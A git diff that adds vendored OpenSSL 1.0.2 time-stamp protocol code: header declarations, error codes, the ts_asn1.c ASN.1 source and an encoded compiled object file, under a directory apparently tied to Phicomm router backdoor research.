+void TS_RESP_CTX_set_extension_cb(TS_RESP_CTX *ctx,
+                                  TS_extension_cb cb, void *data);
+
+/* The following methods can be used in the callbacks. */
+int TS_RESP_CTX_set_status_info(TS_RESP_CTX *ctx,
+                                int status, const char *text);
+
+/* Sets the status info only if it is still TS_STATUS_GRANTED. */
+int TS_RESP_CTX_set_status_info_cond(TS_RESP_CTX *ctx,
+                                     int status, const char *text);
+
+int TS_RESP_CTX_add_failure_info(TS_RESP_CTX *ctx, int failure);
+
+/* The get methods below can be used in the extension callback. */
+TS_REQ *TS_RESP_CTX_get_request(TS_RESP_CTX *ctx);
+
+TS_TST_INFO *TS_RESP_CTX_get_tst_info(TS_RESP_CTX *ctx);
+
+/*
+ * Creates the signed TS_TST_INFO and puts it in TS_RESP.
+ * In case of errors it sets the status info properly.
+ * Returns NULL only in case of memory allocation/fatal error.
+ */
+TS_RESP *TS_RESP_create_response(TS_RESP_CTX *ctx, BIO *req_bio);
+
+/*
+ * Declarations related to response verification,
+ * they are defined in ts/ts_resp_verify.c.
+ */
+
+int TS_RESP_verify_signature(PKCS7 *token, STACK_OF(X509) *certs,
+                             X509_STORE *store, X509 **signer_out);
+
+/* Context structure for the generic verify method. */
+
+/* Verify the signer's certificate and the signature of the response. */
+# define TS_VFY_SIGNATURE        (1u << 0)
+/* Verify the version number of the response. */
+# define TS_VFY_VERSION          (1u << 1)
+/* Verify if the policy supplied by the user matches the policy of the TSA. */
+# define TS_VFY_POLICY           (1u << 2)
+/*
+ * Verify the message imprint provided by the user. This flag should not be
+ * specified with TS_VFY_DATA.
+ */
+# define TS_VFY_IMPRINT          (1u << 3)
+/*
+ * Verify the message imprint computed by the verify method from the user
+ * provided data and the MD algorithm of the response. This flag should not
+ * be specified with TS_VFY_IMPRINT.
+ */
+# define TS_VFY_DATA             (1u << 4)
+/* Verify the nonce value. */
+# define TS_VFY_NONCE            (1u << 5)
+/* Verify if the TSA name field matches the signer certificate. */
+# define TS_VFY_SIGNER           (1u << 6)
+/* Verify if the TSA name field equals to the user provided name. */
+# define TS_VFY_TSA_NAME         (1u << 7)
+
+/* You can use the following convenience constants. */
+# define TS_VFY_ALL_IMPRINT      (TS_VFY_SIGNATURE       \
+                                 | TS_VFY_VERSION       \
+                                 | TS_VFY_POLICY        \
+                                 | TS_VFY_IMPRINT       \
+                                 | TS_VFY_NONCE         \
+                                 | TS_VFY_SIGNER        \
+                                 | TS_VFY_TSA_NAME)
+# define TS_VFY_ALL_DATA         (TS_VFY_SIGNATURE       \
+                                 | TS_VFY_VERSION       \
+                                 | TS_VFY_POLICY        \
+                                 | TS_VFY_DATA          \
+                                 | TS_VFY_NONCE         \
+                                 | TS_VFY_SIGNER        \
+                                 | TS_VFY_TSA_NAME)
+
+typedef struct TS_verify_ctx {
+    /* Set this to the union of TS_VFY_... flags you want to carry out. */
+    unsigned flags;
+    /* Must be set only with TS_VFY_SIGNATURE. certs is optional. */
+    X509_STORE *store;
+    STACK_OF(X509) *certs;
+    /* Must be set only with TS_VFY_POLICY. */
+    ASN1_OBJECT *policy;
+    /*
+     * Must be set only with TS_VFY_IMPRINT. If md_alg is NULL, the
+     * algorithm from the response is used.
+     */
+    X509_ALGOR *md_alg;
+    unsigned char *imprint;
+    unsigned imprint_len;
+    /* Must be set only with TS_VFY_DATA. */
+    BIO *data;
+    /* Must be set only with TS_VFY_TSA_NAME. */
+    ASN1_INTEGER *nonce;
+    /* Must be set only with TS_VFY_TSA_NAME. */
+    GENERAL_NAME *tsa_name;
+} TS_VERIFY_CTX;
+
+int TS_RESP_verify_response(TS_VERIFY_CTX *ctx, TS_RESP *response);
+int TS_RESP_verify_token(TS_VERIFY_CTX *ctx, PKCS7 *token);
+
+/*
+ * Declarations related to response verification context,
+ * they are defined in ts/ts_verify_ctx.c.
+ */
+
+/* Set all fields to zero. */
+TS_VERIFY_CTX *TS_VERIFY_CTX_new(void);
+void TS_VERIFY_CTX_init(TS_VERIFY_CTX *ctx);
+void TS_VERIFY_CTX_free(TS_VERIFY_CTX *ctx);
+void TS_VERIFY_CTX_cleanup(TS_VERIFY_CTX *ctx);
+
+/*-
+ * If ctx is NULL, it allocates and returns a new object, otherwise
+ * it returns ctx. It initialises all the members as follows:
+ * flags = TS_VFY_ALL_IMPRINT & ~(TS_VFY_TSA_NAME | TS_VFY_SIGNATURE)
+ * certs = NULL
+ * store = NULL
+ * policy = policy from the request or NULL if absent (in this case
+ *      TS_VFY_POLICY is cleared from flags as well)
+ * md_alg = MD algorithm from request
+ * imprint, imprint_len = imprint from request
+ * data = NULL
+ * nonce, nonce_len = nonce from the request or NULL if absent (in this case
+ *      TS_VFY_NONCE is cleared from flags as well)
+ * tsa_name = NULL
+ * Important: after calling this method TS_VFY_SIGNATURE should be added!
+ */
+TS_VERIFY_CTX *TS_REQ_to_TS_VERIFY_CTX(TS_REQ *req, TS_VERIFY_CTX *ctx);
+
+/* Function declarations for TS_RESP defined in ts/ts_resp_print.c */
+
+int TS_RESP_print_bio(BIO *bio, TS_RESP *a);
+int TS_STATUS_INFO_print_bio(BIO *bio, TS_STATUS_INFO *a);
+int TS_TST_INFO_print_bio(BIO *bio, TS_TST_INFO *a);
+
+/* Common utility functions defined in ts/ts_lib.c */
+
+int TS_ASN1_INTEGER_print_bio(BIO *bio, const ASN1_INTEGER *num);
+int TS_OBJ_print_bio(BIO *bio, const ASN1_OBJECT *obj);
+int TS_ext_print_bio(BIO *bio, const STACK_OF(X509_EXTENSION) *extensions);
+int TS_X509_ALGOR_print_bio(BIO *bio, const X509_ALGOR *alg);
+int TS_MSG_IMPRINT_print_bio(BIO *bio, TS_MSG_IMPRINT *msg);
+
+/*
+ * Function declarations for handling configuration options, defined in
+ * ts/ts_conf.c
+ */
+
+X509 *TS_CONF_load_cert(const char *file);
+STACK_OF(X509) *TS_CONF_load_certs(const char *file);
+EVP_PKEY *TS_CONF_load_key(const char *file, const char *pass);
+const char *TS_CONF_get_tsa_section(CONF *conf, const char *section);
+int TS_CONF_set_serial(CONF *conf, const char *section, TS_serial_cb cb,
+                       TS_RESP_CTX *ctx);
+int TS_CONF_set_crypto_device(CONF *conf, const char *section,
+                              const char *device);
+int TS_CONF_set_default_engine(const char *name);
+int TS_CONF_set_signer_cert(CONF *conf, const char *section,
+                            const char *cert, TS_RESP_CTX *ctx);
+int TS_CONF_set_certs(CONF *conf, const char *section, const char *certs,
+                      TS_RESP_CTX *ctx);
+int TS_CONF_set_signer_key(CONF *conf, const char *section,
+                           const char *key, const char *pass,
+                           TS_RESP_CTX *ctx);
+int TS_CONF_set_def_policy(CONF *conf, const char *section,
+                           const char *policy, TS_RESP_CTX *ctx);
+int TS_CONF_set_policies(CONF *conf, const char *section, TS_RESP_CTX *ctx);
+int TS_CONF_set_digests(CONF *conf, const char *section, TS_RESP_CTX *ctx);
+int TS_CONF_set_accuracy(CONF *conf, const char *section, TS_RESP_CTX *ctx);
+int TS_CONF_set_clock_precision_digits(CONF *conf, const char *section,
+                                       TS_RESP_CTX *ctx);
+int TS_CONF_set_ordering(CONF *conf, const char *section, TS_RESP_CTX *ctx);
+int TS_CONF_set_tsa_name(CONF *conf, const char *section, TS_RESP_CTX *ctx);
+int TS_CONF_set_ess_cert_id_chain(CONF *conf, const char *section,
+                                  TS_RESP_CTX *ctx);
+
+/* -------------------------------------------------- */
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+void ERR_load_TS_strings(void);
+
+/* Error codes for the TS functions. */
+
+/* Function codes. */
+# define TS_F_D2I_TS_RESP                                 147
+# define TS_F_DEF_SERIAL_CB                               110
+# define TS_F_DEF_TIME_CB                                 111
+# define TS_F_ESS_ADD_SIGNING_CERT                        112
+# define TS_F_ESS_CERT_ID_NEW_INIT                        113
+# define TS_F_ESS_SIGNING_CERT_NEW_INIT                   114
+# define TS_F_INT_TS_RESP_VERIFY_TOKEN                    149
+# define TS_F_PKCS7_TO_TS_TST_INFO                        148
+# define TS_F_TS_ACCURACY_SET_MICROS                      115
+# define TS_F_TS_ACCURACY_SET_MILLIS                      116
+# define TS_F_TS_ACCURACY_SET_SECONDS                     117
+# define TS_F_TS_CHECK_IMPRINTS                           100
+# define TS_F_TS_CHECK_NONCES                             101
+# define TS_F_TS_CHECK_POLICY                             102
+# define TS_F_TS_CHECK_SIGNING_CERTS                      103
+# define TS_F_TS_CHECK_STATUS_INFO                        104
+# define TS_F_TS_COMPUTE_IMPRINT                          145
+# define TS_F_TS_CONF_SET_DEFAULT_ENGINE                  146
+# define TS_F_TS_GET_STATUS_TEXT                          105
+# define TS_F_TS_MSG_IMPRINT_SET_ALGO                     118
+# define TS_F_TS_REQ_SET_MSG_IMPRINT                      119
+# define TS_F_TS_REQ_SET_NONCE                            120
+# define TS_F_TS_REQ_SET_POLICY_ID                        121
+# define TS_F_TS_RESP_CREATE_RESPONSE                     122
+# define TS_F_TS_RESP_CREATE_TST_INFO                     123
+# define TS_F_TS_RESP_CTX_ADD_FAILURE_INFO                124
+# define TS_F_TS_RESP_CTX_ADD_MD                          125
+# define TS_F_TS_RESP_CTX_ADD_POLICY                      126
+# define TS_F_TS_RESP_CTX_NEW                             127
+# define TS_F_TS_RESP_CTX_SET_ACCURACY                    128
+# define TS_F_TS_RESP_CTX_SET_CERTS                       129
+# define TS_F_TS_RESP_CTX_SET_DEF_POLICY                  130
+# define TS_F_TS_RESP_CTX_SET_SIGNER_CERT                 131
+# define TS_F_TS_RESP_CTX_SET_STATUS_INFO                 132
+# define TS_F_TS_RESP_GET_POLICY                          133
+# define TS_F_TS_RESP_SET_GENTIME_WITH_PRECISION          134
+# define TS_F_TS_RESP_SET_STATUS_INFO                     135
+# define TS_F_TS_RESP_SET_TST_INFO                        150
+# define TS_F_TS_RESP_SIGN                                136
+# define TS_F_TS_RESP_VERIFY_SIGNATURE                    106
+# define TS_F_TS_RESP_VERIFY_TOKEN                        107
+# define TS_F_TS_TST_INFO_SET_ACCURACY                    137
+# define TS_F_TS_TST_INFO_SET_MSG_IMPRINT                 138
+# define TS_F_TS_TST_INFO_SET_NONCE                       139
+# define TS_F_TS_TST_INFO_SET_POLICY_ID                   140
+# define TS_F_TS_TST_INFO_SET_SERIAL                      141
+# define TS_F_TS_TST_INFO_SET_TIME                        142
+# define TS_F_TS_TST_INFO_SET_TSA                         143
+# define TS_F_TS_VERIFY                                   108
+# define TS_F_TS_VERIFY_CERT                              109
+# define TS_F_TS_VERIFY_CTX_NEW                           144
+
+/* Reason codes. */
+# define TS_R_BAD_PKCS7_TYPE                              132
+# define TS_R_BAD_TYPE                                    133
+# define TS_R_CERTIFICATE_VERIFY_ERROR                    100
+# define TS_R_COULD_NOT_SET_ENGINE                        127
+# define TS_R_COULD_NOT_SET_TIME                          115
+# define TS_R_D2I_TS_RESP_INT_FAILED                      128
+# define TS_R_DETACHED_CONTENT                            134
+# define TS_R_ESS_ADD_SIGNING_CERT_ERROR                  116
+# define TS_R_ESS_SIGNING_CERTIFICATE_ERROR               101
+# define TS_R_INVALID_NULL_POINTER                        102
+# define TS_R_INVALID_SIGNER_CERTIFICATE_PURPOSE          117
+# define TS_R_MESSAGE_IMPRINT_MISMATCH                    103
+# define TS_R_NONCE_MISMATCH                              104
+# define TS_R_NONCE_NOT_RETURNED                          105
+# define TS_R_NO_CONTENT                                  106
+# define TS_R_NO_TIME_STAMP_TOKEN                         107
+# define TS_R_PKCS7_ADD_SIGNATURE_ERROR                   118
+# define TS_R_PKCS7_ADD_SIGNED_ATTR_ERROR                 119
+# define TS_R_PKCS7_TO_TS_TST_INFO_FAILED                 129
+# define TS_R_POLICY_MISMATCH                             108
+# define TS_R_PRIVATE_KEY_DOES_NOT_MATCH_CERTIFICATE      120
+# define TS_R_RESPONSE_SETUP_ERROR                        121
+# define TS_R_SIGNATURE_FAILURE                           109
+# define TS_R_THERE_MUST_BE_ONE_SIGNER                    110
+# define TS_R_TIME_SYSCALL_ERROR                          122
+# define TS_R_TOKEN_NOT_PRESENT                           130
+# define TS_R_TOKEN_PRESENT                               131
+# define TS_R_TSA_NAME_MISMATCH                           111
+# define TS_R_TSA_UNTRUSTED                               112
+# define TS_R_TST_INFO_SETUP_ERROR                        123
+# define TS_R_TS_DATASIGN                                 124
+# define TS_R_UNACCEPTABLE_POLICY                         125
+# define TS_R_UNSUPPORTED_MD_ALGORITHM                    126
+# define TS_R_UNSUPPORTED_VERSION                         113
+# define TS_R_WRONG_CONTENT_TYPE                          114
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_asn1.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_asn1.c
new file mode 100644
index 0000000..657dc4c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_asn1.c
@@ -0,0 +1,326 @@
+/* crypto/ts/ts_asn1.c */
+/*
+ * Written by Nils Larsch for the OpenSSL project 2004.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <openssl/ts.h>
+#include <openssl/err.h>
+#include <openssl/asn1t.h>
+
+ASN1_SEQUENCE(TS_MSG_IMPRINT) = {
+        ASN1_SIMPLE(TS_MSG_IMPRINT, hash_algo, X509_ALGOR),
+        ASN1_SIMPLE(TS_MSG_IMPRINT, hashed_msg, ASN1_OCTET_STRING)
+} ASN1_SEQUENCE_END(TS_MSG_IMPRINT)
+
+IMPLEMENT_ASN1_FUNCTIONS_const(TS_MSG_IMPRINT)
+IMPLEMENT_ASN1_DUP_FUNCTION(TS_MSG_IMPRINT)
+#ifndef OPENSSL_NO_BIO
+TS_MSG_IMPRINT *d2i_TS_MSG_IMPRINT_bio(BIO *bp, TS_MSG_IMPRINT **a)
+{
+    return ASN1_d2i_bio_of(TS_MSG_IMPRINT, TS_MSG_IMPRINT_new,
+                           d2i_TS_MSG_IMPRINT, bp, a);
+}
+
+int i2d_TS_MSG_IMPRINT_bio(BIO *bp, TS_MSG_IMPRINT *a)
+{
+    return ASN1_i2d_bio_of_const(TS_MSG_IMPRINT, i2d_TS_MSG_IMPRINT, bp, a);
+}
+#endif
+#ifndef OPENSSL_NO_FP_API
+TS_MSG_IMPRINT *d2i_TS_MSG_IMPRINT_fp(FILE *fp, TS_MSG_IMPRINT **a)
+{
+    return ASN1_d2i_fp_of(TS_MSG_IMPRINT, TS_MSG_IMPRINT_new,
+                          d2i_TS_MSG_IMPRINT, fp, a);
+}
+
+int i2d_TS_MSG_IMPRINT_fp(FILE *fp, TS_MSG_IMPRINT *a)
+{
+    return ASN1_i2d_fp_of_const(TS_MSG_IMPRINT, i2d_TS_MSG_IMPRINT, fp, a);
+}
+#endif
+
+ASN1_SEQUENCE(TS_REQ) = {
+        ASN1_SIMPLE(TS_REQ, version, ASN1_INTEGER),
+        ASN1_SIMPLE(TS_REQ, msg_imprint, TS_MSG_IMPRINT),
+        ASN1_OPT(TS_REQ, policy_id, ASN1_OBJECT),
+        ASN1_OPT(TS_REQ, nonce, ASN1_INTEGER),
+        ASN1_OPT(TS_REQ, cert_req, ASN1_FBOOLEAN),
+        ASN1_IMP_SEQUENCE_OF_OPT(TS_REQ, extensions, X509_EXTENSION, 0)
+} ASN1_SEQUENCE_END(TS_REQ)
+
+IMPLEMENT_ASN1_FUNCTIONS_const(TS_REQ)
+IMPLEMENT_ASN1_DUP_FUNCTION(TS_REQ)
+#ifndef OPENSSL_NO_BIO
+TS_REQ *d2i_TS_REQ_bio(BIO *bp, TS_REQ **a)
+{
+    return ASN1_d2i_bio_of(TS_REQ, TS_REQ_new, d2i_TS_REQ, bp, a);
+}
+
+int i2d_TS_REQ_bio(BIO *bp, TS_REQ *a)
+{
+    return ASN1_i2d_bio_of_const(TS_REQ, i2d_TS_REQ, bp, a);
+}
+#endif
+#ifndef OPENSSL_NO_FP_API
+TS_REQ *d2i_TS_REQ_fp(FILE *fp, TS_REQ **a)
+{
+    return ASN1_d2i_fp_of(TS_REQ, TS_REQ_new, d2i_TS_REQ, fp, a);
+}
+
+int i2d_TS_REQ_fp(FILE *fp, TS_REQ *a)
+{
+    return ASN1_i2d_fp_of_const(TS_REQ, i2d_TS_REQ, fp, a);
+}
+#endif
+
+ASN1_SEQUENCE(TS_ACCURACY) = {
+        ASN1_OPT(TS_ACCURACY, seconds, ASN1_INTEGER),
+        ASN1_IMP_OPT(TS_ACCURACY, millis, ASN1_INTEGER, 0),
+        ASN1_IMP_OPT(TS_ACCURACY, micros, ASN1_INTEGER, 1)
+} ASN1_SEQUENCE_END(TS_ACCURACY)
+
+IMPLEMENT_ASN1_FUNCTIONS_const(TS_ACCURACY)
+IMPLEMENT_ASN1_DUP_FUNCTION(TS_ACCURACY)
+
+ASN1_SEQUENCE(TS_TST_INFO) = {
+        ASN1_SIMPLE(TS_TST_INFO, version, ASN1_INTEGER),
+        ASN1_SIMPLE(TS_TST_INFO, policy_id, ASN1_OBJECT),
+        ASN1_SIMPLE(TS_TST_INFO, msg_imprint, TS_MSG_IMPRINT),
+        ASN1_SIMPLE(TS_TST_INFO, serial, ASN1_INTEGER),
+        ASN1_SIMPLE(TS_TST_INFO, time, ASN1_GENERALIZEDTIME),
+        ASN1_OPT(TS_TST_INFO, accuracy, TS_ACCURACY),
+        ASN1_OPT(TS_TST_INFO, ordering, ASN1_FBOOLEAN),
+        ASN1_OPT(TS_TST_INFO, nonce, ASN1_INTEGER),
+        ASN1_EXP_OPT(TS_TST_INFO, tsa, GENERAL_NAME, 0),
+        ASN1_IMP_SEQUENCE_OF_OPT(TS_TST_INFO, extensions, X509_EXTENSION, 1)
+} ASN1_SEQUENCE_END(TS_TST_INFO)
+
+IMPLEMENT_ASN1_FUNCTIONS_const(TS_TST_INFO)
+IMPLEMENT_ASN1_DUP_FUNCTION(TS_TST_INFO)
+#ifndef OPENSSL_NO_BIO
+TS_TST_INFO *d2i_TS_TST_INFO_bio(BIO *bp, TS_TST_INFO **a)
+{
+    return ASN1_d2i_bio_of(TS_TST_INFO, TS_TST_INFO_new, d2i_TS_TST_INFO, bp,
+                           a);
+}
+
+int i2d_TS_TST_INFO_bio(BIO *bp, TS_TST_INFO *a)
+{
+    return ASN1_i2d_bio_of_const(TS_TST_INFO, i2d_TS_TST_INFO, bp, a);
+}
+#endif
+#ifndef OPENSSL_NO_FP_API
+TS_TST_INFO *d2i_TS_TST_INFO_fp(FILE *fp, TS_TST_INFO **a)
+{
+    return ASN1_d2i_fp_of(TS_TST_INFO, TS_TST_INFO_new, d2i_TS_TST_INFO, fp,
+                          a);
+}
+
+int i2d_TS_TST_INFO_fp(FILE *fp, TS_TST_INFO *a)
+{
+    return ASN1_i2d_fp_of_const(TS_TST_INFO, i2d_TS_TST_INFO, fp, a);
+}
+#endif
+
+ASN1_SEQUENCE(TS_STATUS_INFO) = {
+        ASN1_SIMPLE(TS_STATUS_INFO, status, ASN1_INTEGER),
+        ASN1_SEQUENCE_OF_OPT(TS_STATUS_INFO, text, ASN1_UTF8STRING),
+        ASN1_OPT(TS_STATUS_INFO, failure_info, ASN1_BIT_STRING)
+} ASN1_SEQUENCE_END(TS_STATUS_INFO)
+
+IMPLEMENT_ASN1_FUNCTIONS_const(TS_STATUS_INFO)
+IMPLEMENT_ASN1_DUP_FUNCTION(TS_STATUS_INFO)
+
+static int ts_resp_set_tst_info(TS_RESP *a)
+{
+    long status;
+
+    status = ASN1_INTEGER_get(a->status_info->status);
+
+    if (a->token) {
+        if (status != 0 && status != 1) {
+            TSerr(TS_F_TS_RESP_SET_TST_INFO, TS_R_TOKEN_PRESENT);
+            return 0;
+        }
+        if (a->tst_info != NULL)
+            TS_TST_INFO_free(a->tst_info);
+        a->tst_info = PKCS7_to_TS_TST_INFO(a->token);
+        if (!a->tst_info) {
+            TSerr(TS_F_TS_RESP_SET_TST_INFO,
+                  TS_R_PKCS7_TO_TS_TST_INFO_FAILED);
+            return 0;
+        }
+    } else if (status == 0 || status == 1) {
+        TSerr(TS_F_TS_RESP_SET_TST_INFO, TS_R_TOKEN_NOT_PRESENT);
+        return 0;
+    }
+
+    return 1;
+}
+
+static int ts_resp_cb(int op, ASN1_VALUE **pval, const ASN1_ITEM *it,
+                      void *exarg)
+{
+    TS_RESP *ts_resp = (TS_RESP *)*pval;
+    if (op == ASN1_OP_NEW_POST) {
+        ts_resp->tst_info = NULL;
+    } else if (op == ASN1_OP_FREE_POST) {
+        if (ts_resp->tst_info != NULL)
+            TS_TST_INFO_free(ts_resp->tst_info);
+    } else if (op == ASN1_OP_D2I_POST) {
+        if (ts_resp_set_tst_info(ts_resp) == 0)
+            return 0;
+    }
+    return 1;
+}
+
+ASN1_SEQUENCE_cb(TS_RESP, ts_resp_cb) = {
+        ASN1_SIMPLE(TS_RESP, status_info, TS_STATUS_INFO),
+        ASN1_OPT(TS_RESP, token, PKCS7),
+} ASN1_SEQUENCE_END_cb(TS_RESP, TS_RESP)
+
+IMPLEMENT_ASN1_FUNCTIONS_const(TS_RESP)
+
+IMPLEMENT_ASN1_DUP_FUNCTION(TS_RESP)
+
+#ifndef OPENSSL_NO_BIO
+TS_RESP *d2i_TS_RESP_bio(BIO *bp, TS_RESP **a)
+{
+    return ASN1_d2i_bio_of(TS_RESP, TS_RESP_new, d2i_TS_RESP, bp, a);
+}
+
+int i2d_TS_RESP_bio(BIO *bp, TS_RESP *a)
+{
+    return ASN1_i2d_bio_of_const(TS_RESP, i2d_TS_RESP, bp, a);
+}
+#endif
+#ifndef OPENSSL_NO_FP_API
+TS_RESP *d2i_TS_RESP_fp(FILE *fp, TS_RESP **a)
+{
+    return ASN1_d2i_fp_of(TS_RESP, TS_RESP_new, d2i_TS_RESP, fp, a);
+}
+
+int i2d_TS_RESP_fp(FILE *fp, TS_RESP *a)
+{
+    return ASN1_i2d_fp_of_const(TS_RESP, i2d_TS_RESP, fp, a);
+}
+#endif
+
+ASN1_SEQUENCE(ESS_ISSUER_SERIAL) = {
+        ASN1_SEQUENCE_OF(ESS_ISSUER_SERIAL, issuer, GENERAL_NAME),
+        ASN1_SIMPLE(ESS_ISSUER_SERIAL, serial, ASN1_INTEGER)
+} ASN1_SEQUENCE_END(ESS_ISSUER_SERIAL)
+
+IMPLEMENT_ASN1_FUNCTIONS_const(ESS_ISSUER_SERIAL)
+IMPLEMENT_ASN1_DUP_FUNCTION(ESS_ISSUER_SERIAL)
+
+ASN1_SEQUENCE(ESS_CERT_ID) = {
+        ASN1_SIMPLE(ESS_CERT_ID, hash, ASN1_OCTET_STRING),
+        ASN1_OPT(ESS_CERT_ID, issuer_serial, ESS_ISSUER_SERIAL)
+} ASN1_SEQUENCE_END(ESS_CERT_ID)
+
+IMPLEMENT_ASN1_FUNCTIONS_const(ESS_CERT_ID)
+IMPLEMENT_ASN1_DUP_FUNCTION(ESS_CERT_ID)
+
+ASN1_SEQUENCE(ESS_SIGNING_CERT) = {
+        ASN1_SEQUENCE_OF(ESS_SIGNING_CERT, cert_ids, ESS_CERT_ID),
+        ASN1_SEQUENCE_OF_OPT(ESS_SIGNING_CERT, policy_info, POLICYINFO)
+} ASN1_SEQUENCE_END(ESS_SIGNING_CERT)
+
+IMPLEMENT_ASN1_FUNCTIONS_const(ESS_SIGNING_CERT)
+IMPLEMENT_ASN1_DUP_FUNCTION(ESS_SIGNING_CERT)
+
+/* Getting encapsulated TS_TST_INFO object from PKCS7. */
+TS_TST_INFO *PKCS7_to_TS_TST_INFO(PKCS7 *token)
+{
+    PKCS7_SIGNED *pkcs7_signed;
+    PKCS7 *enveloped;
+    ASN1_TYPE *tst_info_wrapper;
+    ASN1_OCTET_STRING *tst_info_der;
+    const unsigned char *p;
+
+    if (!PKCS7_type_is_signed(token)) {
+        TSerr(TS_F_PKCS7_TO_TS_TST_INFO, TS_R_BAD_PKCS7_TYPE);
+        return NULL;
+    }
+
+    /* Content must be present. */
+    if (PKCS7_get_detached(token)) {
+        TSerr(TS_F_PKCS7_TO_TS_TST_INFO, TS_R_DETACHED_CONTENT);
+        return NULL;
+    }
+
+    /* We have a signed data with content. */
+    pkcs7_signed = token->d.sign;
+    enveloped = pkcs7_signed->contents;
+    if (OBJ_obj2nid(enveloped->type) != NID_id_smime_ct_TSTInfo) {
+        TSerr(TS_F_PKCS7_TO_TS_TST_INFO, TS_R_BAD_PKCS7_TYPE);
+        return NULL;
+    }
+
+    /* We have a DER encoded TST_INFO as the signed data. */
+    tst_info_wrapper = enveloped->d.other;
+    if (tst_info_wrapper->type != V_ASN1_OCTET_STRING) {
+        TSerr(TS_F_PKCS7_TO_TS_TST_INFO, TS_R_BAD_TYPE);
+        return NULL;
+    }
+
+    /* We have the correct ASN1_OCTET_STRING type. */
+    tst_info_der = tst_info_wrapper->value.octet_string;
+    /* At last, decode the TST_INFO. */
+    p = tst_info_der->data;
+    return d2i_TS_TST_INFO(NULL, &p, tst_info_der->length);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_asn1.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_asn1.o
new file mode 100644
index 0000000000000000000000000000000000000000..50e46b2815073ff57ae18b69212836e2894a0eb5
GIT binary patch
literal 18360
zcmeI34RBl4mB*jsusCg!Dl`R`uZlK6psBFKM+_5KIgVnPHMVQXC6u(!jx1sk+Y+)w
z5@3p36BgIdb!TaoDNHvzl!fWCZ7BU<Xcn{sZ3DxUv_m_z1FffJcanv&fp%t77Ra9S
z-Z}E$NAGQ1$h5OFduOD3@9+NaIrrXob)TN@)y;{{4GZe(91V5OWzK9)spGV?&8FjC
zGVYw<EOUPMzSG}G-m!$qL4JE@`45=-e{B9zQ~!_6UpTk^<lD(RjETuNl9R6qP2OSk
zuP2X9l^Vl;wuaa%YOjbHo_REU9+E%NApd{gc)I(aR6CPvCtS^k`xs1xV}1ov$;tmt
zPP`IHPTkx%n4DU8=1S^ea&rBOhUUrv?(M|k6U&!0Kh^w`#};@czw&5uXQi|_(OhYM
z>d{*Xzq}?n)fP=oZCsh0y0OtyT>30=)!f3G_p@fAWnt+wzv51UkKIXckDo_xUZv*B
z%O6Zm#T$~7|K5BgIn_gn<tvhzi0^Z%b49~o^8CeK8%xLeaN^0x)lcvxnLK>t*;I1s
z^zxGA58EPS(K$FxZxe^>%O9XtMUp#@NS#M`oqqZHiNnX0f1jMHPfoRnsT&)d(q+ks
z!*$n7-zHeNc5ZFTHTe3;HZoc%@A13yS=L6l_O`G1<a0zG+eL5K!K<H0q*89GqrI!6
ztKDr&^roFmwpem=gJVu1Kb*_#aC4*A<Q-OVsoSyM85$THa&lv1<!sR%%NBD3!(MSm
zD%F?hbyJDnj@C{occeU>a(ff09%rmHP%4l4CQJFP*-?i|Qt8%oU&`(1+R!Zmr<C1Z
za;_Q34VQ~qUroAnirlm4`fPD5mmjS*aL^eU+v4U%3dP)L$tmSVvd%yzQ!Wl<b~yRs
zAT@Dxi!+)Z&19X@*nmT}v!iTajJ>zEwe|J3wp~R{&E!X^+atN*;T%VqV%}5qCO+;D
